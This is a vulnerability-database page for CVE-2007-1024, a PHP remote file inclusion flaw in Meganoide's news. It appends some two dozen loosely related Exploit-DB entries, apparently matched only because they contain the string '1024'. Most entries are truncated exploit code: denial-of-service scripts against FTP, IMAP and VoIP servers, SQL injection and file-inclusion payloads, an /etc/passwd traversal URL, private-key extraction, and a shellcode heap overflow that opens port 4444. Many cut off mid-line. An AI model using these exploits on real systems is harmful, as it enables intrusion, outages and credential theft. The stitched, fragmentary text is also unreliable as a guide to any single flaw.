CVE-2007-1024
Published 2007-02-21
Priority: P348
Severity: critical (CVSS 2.0 base score 10)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit: public exploit available
EPSS: 4.86% (90.9th percentile)
PHP remote file inclusion vulnerability in include.php in Meganoide's news 1.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the _SERVER[DOCUMENT_ROOT] parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| marcello_vitagliano | meganoides_news | — | — |
No detection rules found.
Exploit-DB (2007-12-21): CVE-2007-6584 1024 CMS 1.3.1 - Local File Inclusion / SQL Injection
---
vuln.: 1024 CMS 1.3.1 (LFI/SQL) Multiple Vulnerabilities
script info and download: http://www.1024cms.com
author: irk4z[at]yahoo.pl
greets to: str0ke, wacky
'-----------------------------------------------------------------------------'
# sql-injection:
code:
/admin/ops/findip/ajax/search.php:
...
8 $get_users = mysql_query("SELECT id, username FROM ".$prefix."users WHERE ip='".$_POST['ip']."'") or die("cannot get ips: ".mysql_error());
...
^ if magic_quotes_gpc==off, we can get all usernames and passwords from database ;]
exploit:
# local file inclusion:
code:
/admin/ops/reports/ops/download.php, /admin/ops/reports/ops/forum.php, /admin/ops/reports/ops/news.php:
...
1 <?php
2 include("./themes/".$admin_theme_dir."
Exploit-DB (2007-12-17): CVE-2007-6341 Perl Net::DNS 0.48/0.59/0.60 - DNS Response Remote Denial of Service
---
source: https://www.securityfocus.com/bid/26902/info
The Perl Net::DNS module is prone to a remote denial-of-service vulnerability because the module fails to properly handle malformed DNS responses.
Successfully exploiting this issue allows attackers to crash applications that use the affected module.
Net::DNS 0.60 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# Beyond Security(c)
# Vulnerability found by beSTORM - DNS Server module
use strict;
use IO::Socket;
my($sock, $oldmsg, $newmsg, $hisaddr, $hishost, $MAXLEN, $PORTNO);
$MAXLEN = 1024;
$PORTNO = 5351;
$sock = IO::Socket::INET->new(LocalPort => $PORTNO, Proto => 'udp') or die "socket: $@";
print "Awaiting UDP messages on port $PORTNO
Exploit-DB (2007-11-16): CVE-2007-4684 Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC)
---
#include
#include
#include
#include
#include
#include
#include
int
main(void)
{
union ldt_entry descs;
char *buf;
u_long pgsz = sysconf(_SC_PAGESIZE);
if ((buf = (char *)malloc(pgsz * 4)) == -1) {
perror("malloc");
exit(EXIT_FAILURE);
}
memset(buf, 0x41, pgsz * 4);
buf = (char *)(((u_long)buf & ~pgsz) + pgsz);
if (mprotect((char *)((u_long)buf + (pgsz * 2)), (size_t)pgsz,
PROT_WRITE) == -1) {
perror("mprotect");
exit(EXIT_FAILURE);
}
/*
 * This will result in the kalloc() size argument being 0x00000000 and
 * the copyin() size argument being 0xfffffff8.
 */
if (i386_set_ldt(1024, (union ldt_entry *)&buf, -1) == -1) {
perror("i386_set_ldt");
exit(EXIT_FAILURE);
}
exit(EXIT_SUCCESS);
}
// milw0rm.com [2007-11-16]
Exploit-DB (2007-08-23): CVE-2007-4528 PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass
---
WinExec("cmd.exe /c $command >\"$output\"",0);
while(!file_exists($output))sleep(1);
$con='';
$fp=fopen($output,'r');
while(!feof($fp))$con.=fgets($fp,1024);
fclose($fp);
$con=htmlspecialchars($con);
echo "$con";
unlink($output);
?>
# milw0rm.com [2007-08-23]
Exploit-DB (2007-07-18): CVE-2007-3764 Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service
---
#include
#include
#include
#include
#include
#include
#include
#include
#define SKINNY_TCP_PORT 2000
#define CLEN 1024
#define SKINNY_MAX_SIZE 1000
#define REGISTER_MESSAGE 0x0001
struct register_message {
char name[16];
uint32_t userId;
uint32_t instance;
uint32_t ip;
uint32_t type;
uint32_t maxStreams;
};
struct skinny_client {
int sd;
struct sockaddr_in saddr;
int active;
char rhost[CLEN];
char username[CLEN];
char password[CLEN];
char packet[SKINNY_MAX_SIZE];
};
struct skinny_client_message {
int len;
int res;
int e; /* 12 bytes */
char *data;
};
struct skinny_client *g_sc;
struct messages {
int e;
char *human;
int (* const message_handler)(struct skinny_client *sc, struct skinny_client_message *scm);
} message_list[] = {
{0x81,"Register Ack Message\n", NULL},
{0x9b,"Capabil
Exploit-DB (2007-05-07): CVE-2007-2027 ELinks Relative 0.10.6/011.1 - Path Arbitrary Code Execution
---
source: https://www.securityfocus.com/bid/23844/info
ELinks is prone to an arbitrary code-execution vulnerability.
An attacker can exploit this issue to potentially execute arbitrary code with the privileges of the user running the affected application.
This issue requires an attacker to trick an unsuspecting victim into running the vulnerable application in an attacker-controlled directory.
This issue affects ELinks 0.11.1; other versions may also be vulnerable.
$ mkdir -p /tmp/elinks/{run,po}
$ cp /usr/share/locale/fr/LC_MESSAGES/elinks.mo /tmp/elinks/po/fr.gmo
$ dd if=/dev/urandom of=/tmp/elinks/po/fr.gmo bs=1024 seek=1 count=200
$ cd /tmp/elinks/run
Exploit-DB (2007-05-02): CVE-2007-2507 1024 CMS 0.7 - 'download.php' Remote File Disclosure
---
\#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| [ Y! Underground Group ] |
| [ www.dj7xpl.2600.ir ] |
| [ Dj7xpl @ 2600.ir ] |
[!] Portal : 1024 CMS Version 0.7
[!] Vendor : http://www.treble.lfhost.com
[!] Author : Dj7xpl
[!] Type : Remote File Disclosure Vuln
[!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me
PoC :
http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd
# milw0rm.com [2007-05-02]
Exploit-DB (2007-04-19): CVE-2007-2257 Fully Modded PHPBB2 - 'phpbb_root_path' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/23565/info
Fully Modded PHPBB2 is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
*/
/* Website : WwW.SoQoR.NeT */
/************************************************/
error_reporting(0);
ini_set("max_execution_time",0);
function get_page($url) {
    if (function_exists("file_get_contents")) {
        $contents = file_get_contents($url);
    } else {
        $fp = fopen("$url", "r");
        while ($line = fread($fp, 1024)) {
            $contents = $contents . $line;
        }
    }
    return $contents;
}
Echo "\nFully Moded PHPBB2 Command Execution Exploit by : HACKERS PAL :
Exploit-DB (2007-03-29): CVE-2007-1675 IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service
---
#!/usr/bin/python
#
# Remote DOS exploit code for IBM Lotus Domino Server 6.5. Tested on windows
# 2000 server SP4. The code crashes the IMAP server. Since this is a simple DOS
# where 256+ (but no more than 270) bytes for the username crashes the service
# this is likely to work on other windows platform aswell. Maybe someone can carry this further and come out
# with a code exec exploit.
#
# Author shall bear no reponsibility for any screw ups caused by using this code
# Winny Thomas :-)
#
import sys
import md5
import struct
import base64
import socket
def ExploitLotus(target):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((target, 143))
response = sock.recv(1024)
print response
auth = 'a0
Exploit-DB (2007-03-20): CVE-2007-1580 FTPDMIN 0.96 - 'LIST' Remote Denial of Service
---
# usr/bin/python
import socket
import time
print "-----------------------------------------------------------------------"
print "# FTPDMIN v. 0.96 LIST Denial of Service"
print "# url: http://www.sentex.net/~mwandel/ftpdmin/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------\n"
buff = "//A:"
user = "anonymous"
password = "shinnai"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",21))
d = s.recv(1024)
print "Server USER " + user
d = s.recv(1024)
print "Server PASS " + password
d = s.recv(1024)
print "Server LIST " + buff
d = s.recv(1024)
print d
tim
Exploit-DB (2007-03-19): CVE-2007-1583 PHP 5.1.6 - Mb_Parse_Str Function Register_Globals Activation
---
source: https://www.securityfocus.com/bid/23016/info
PHP is prone to a weakness that allows attackers to enable the 'register_globals' directive because the application fails to handle a memory-limit exception.
Enabling the PHP 'register_globals' directive may allow attackers to further exploit latent vulnerabilities in PHP scripts.
This issue is related to the weakness found in the non-multibyte 'parse_str()' from BID 15249 - PHP Parse_Str Register_Globals Activation Weakness.
This issue affects PHP 4 to 4.4.6 and 5 to 5.2.1.
2048) $x[] = str_repeat("A", 1024);
// Will activate register_globals and trigger the memory_limit
mb_parse_str($str);
?>
Exploit-DB (2007-03-09): CVE-2007-0217 Microsoft Internet Explorer - FTP Server Response Denial of Service (MS07-016)
---
#!/usr/bin/perl
# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# or at '\r\n'. Each buffer is apended with \x00, without
# bounds checking. If the response is exctly 1024 characters
# in length, you will overflow the heap with the string \x00.
use IO::Socket;
use strict;
# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
LocalHost=>$ip,
LocalPort=>'21',
Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");
# Wait for initial connection and send
Exploit-DB (2007-03-07): CVE-2007-1376 PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure
---
0)
break;
}
}
$offset += 1024;
}
header("Content-type: application/octet-stream");
header("Content-Disposition: attachment; filename=\"server.der\"");
echo $keydata;
?>
# milw0rm.com [2007-03-07]
Exploit-DB (2007-03-07): CVE-2007-1371 radscan conquest 8.2 - Multiple Vulnerabilities
---
source: https://www.securityfocus.com/bid/22855/info
Conquest is prone to multiple remotely exploitable vulnerabilities, including a stack-based buffer-overflow vulnerability and a memory-corruption vulnerability.
An attacker can exploit these issues to execute arbitrary code within the context of the affected application or cause the affected application to crash, denying service to legitimate users.
These issues affect version 8.2a; prior versions may also be affected.
1. Launch a fake metaserver that sends more than 1024 chars:
perl -e 'print "a"x1200' | nc -l -p 1700 -v -v -n
2. Launch the client, specifying the alternate metaserver:
conquest -m -M 127.0.0.1
3. Interrupt the fake metaserver: conquest should have been crashed
t
Exploit-DB (2007-02-22): CVE-2007-0843 Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure
---
// source: https://www.securityfocus.com/bid/22664/info
Microsoft Windows is prone to a local information-disclosure vulnerability.
A local attacker may leverage this issue to gain access to potentially sensitive information about user permissions and accessed files. Information gained may aid in further attacks against the affected computer.
/*
Monitors directory changes
(c) 2006-2007 Vladimir Dubrovin, 3APA3A
http://securityvulns.com/
http://securityvulns.ru/
*/
#include
#include
#include
int main(int argc, char *argv[]){
HANDLE hDir;
char buf[1024];
FILE_NOTIFY_INFORMATION * fn;
int read;
WCHAR * action = NULL;
if(argc != 2) {
printf(
"Usage: %s \n"
" Monitor directory changes with all subdirectories\
Exploit-DB (2007-02-20): CVE-2007-1082 FTP Explorer 1.0.1 Build 047 - Remote CPU Consumption (Denial of Service)
---
/***********************************************************************************
* FTP Explorer 1.0.1 Build 047 Remote DoS (CPU consumption) *
* *
* FTP Explorer is prone to a DoS after receiving a long PWD response leading to *
* 100% CPU consumption. *
* Have Fun! *
* *
* Coded by Marsu *
***********************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[30000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)
Exploit-DB (2007-02-20): CVE-2007-1079 FTP Voyager 14.0.0.3 - 'CWD' Remote Stack Overflow (PoC)
---
/***********************************************************************************
* FTP Voyager .....................................B O O M *
* *
* Only a DoS, I dont think code execution is possible *
* *
* Have Fun! *
* *
* Coded by Marsu *
***********************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#include "windows.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
char recvbuff[1024];
char evilbuff[30000];
sockaddr_in sin;
int server,client;
WSADATA wsaData;
WSAStartup(MAKEWORD(1,1), &wsaData);
server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
sin.sin_family = PF_INET;
sin.sin_addr.s_addr = htonl(INADDR_ANY
Exploit-DB (2007-02-18): CVE-2007-1014 VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)
---
#include
#include
#include
#include
#define PORT 21
int s;
struct sockaddr_in sock_addr;
char recvbuf[1024];
char pwn[450];
int main(int argc, char* argv[])
{
if (argc \n", argv[0]);
return 1; }
if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
printf("error with socket\n");
return 1; }
sock_addr.sin_family = AF_INET;
sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
sock_addr.sin_port = htons(PORT);
if (connect(s, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
printf("unable to connect\n");
return 1; }
printf("[+] Connected\n");
memset(recvbuf, '\0', 1024);
recv(s, recvbuf, 1024, 0);
char userbuf[50];
printf("[+] Sending user...\n");
memset(userbuf, '\0', 50);
memcpy(userbuf, "USER anonymous\r\n", 18);
if (send(s, userbuf, strlen(userbuf), 0) == -
Exploit-DB (2007-02-16): CVE-2007-1024 Meganoide's News 1.1.1 - 'Include.php' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/22589/info
Meganoide's news is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary PHP code in the context of the webserver process.
This issue affects version 1.1.1; other versions may also be affected.
http://www.example.com/path/include.php?_SERVER[DOCUMENT_ROOT]=[shell]
Exploit-DB (2007-02-08): CVE-2007-0887 Axigen 2.0.0b1 - Remote Denial of Service (2)
---
/* doaxigen-v2.c
*
* axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
* by mu-b - Sun Oct 29 2006
*
* - Tested on: AXIGEN 1.2.6 (lnx)
* AXIGEN 2.0.0b1 (lnx)
*
* parsing error results in login without username & password!
* which in turn causes a NULL pointer dereference..
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define BUF_SIZE 1024
#define BBUF_SIZE BUF_SIZE/3*4+1
#define AUTH_CMD "1 AUTHENTICATE PLAIN\r\n"
#define APPEND_CMD "2 APPEND digit-labs\r\n"
#define DEF_PORT 143
#define PORT_IMAPD DEF_PORT
#define RCNT_DELAY 3
static const char base64tab[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static int base64 (const u_char * ibuf, u_char * ob
Exploit-DB (2007-02-08): CVE-2007-0886 Axigen 2.0.0b1 - Remote Denial of Service (1)
---
/* doaxigen.c
*
* axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
* by mu-b - Sat Oct 22 2006
*
* - Tested on: AXIGEN 1.2.6 (lnx)
* AXIGEN 2.0.0b1 (lnx)
*
* 0x08088054: parsing error results in DoS (little-endian, confirmed)
* DoS + off-by-one heap smash (big-endian)
*
* Note: if you receive a SIGPIPE then you crashed the server
* but at too high a memory address... try again.
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define BUF_SIZE 1024
#define BBUF_SIZE BUF_SIZE/3*4+1
#define AUTH_CMD "AUTH CRAM-MD5\r\n"
#define QUIT_CMD "QUIT\r\n"
#define DEF_PORT 110
#define PORT_POP3 DEF_PORT
#define RCNT_DELAY 3
static const char base64tab[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghij
Exploit-DB (2007-01-28): CVE-2007-0449 CA BrightStor ARCserve - 'msgeng.exe' Remote Heap Overflow (2)
---
#!/usr/bin/perl
#
# original exploit by lssec.com this is a perl porting
#
# acaro [at] jervus.it
use IO::Socket::INET;
use Switch;
if (@ARGV new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port);
$socket or die "Cannot connect to host!\n";
$request = $uuid;
send $socket, $request, 0;
print "[+] Sent uuid request\n";
recv($socket, $reply, 1024, 0);
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1006)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 1st request\n";
$request = $special.("\x90"x680).$jmp.$ret.$uef.$shellcode.("\x90"x1029)."\r\n";
send $socket, $request, 0;
print "[+] Sent malicius 2nd request\n";
print " + Connect on 4444 port of $host ...\n";
sleep(3);
system("telnet
Exploit-DB (2007-01-14): CVE-2007-0338 BolinTech DreamFTP Server - 'USER' Remote Buffer Overflow (PoC)
---
/**************************************************************************
*BolinTech DreamFTP USER buffer overflow *
* *
*The server does not correctly handle format string so sending a command *
*like USER %1*3000 let us own EDX. Other values can also affect EAX & ECX *
* *
*This is only a POC but code execution is possible *
* *
*usage: dreamftp.exe ip port *
* *
*Coded by Marsu *
**************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[5003];
int buflen=5000
Exploit-DB (2007-01-14): CVE-2007-0311 WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service
---
/************************************************************************
*WFTPD server *
************************************************************************/
#include "winsock2.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib, "ws2_32.lib")
int main(int argc, char* argv[])
{
struct hostent *he;
struct sockaddr_in sock_addr;
WSADATA wsa;
int ftpsock;
char recvbuff[1024];
char evilbuff[100];
int buflen=100;
if (argc!=5)
{
printf("[+] Usage: %s \n",argv[0]);
return 1;
}
WSACleanup();
WSAStartup(MAKEWORD(2,0),&wsa);
printf("[+] Connecting to %s:%s ... ",argv[1],argv[2]);
if ((he=gethostbyname(argv[1])) == NULL) {
printf("Failed\n[-] Could not init gethostbyname\n");
return 1;
}
if ((ftpsock = socket(PF_INET
References:
http://attrition.org/pipermail/vim/2007-February/001361.html
http://osvdb.org/33736
http://securityreason.com/securityalert/2266
http://www.securityfocus.com/archive/1/460323/100/0/threaded
http://www.securityfocus.com/bid/22589
https://exchange.xforce.ibmcloud.com/vulnerabilities/32546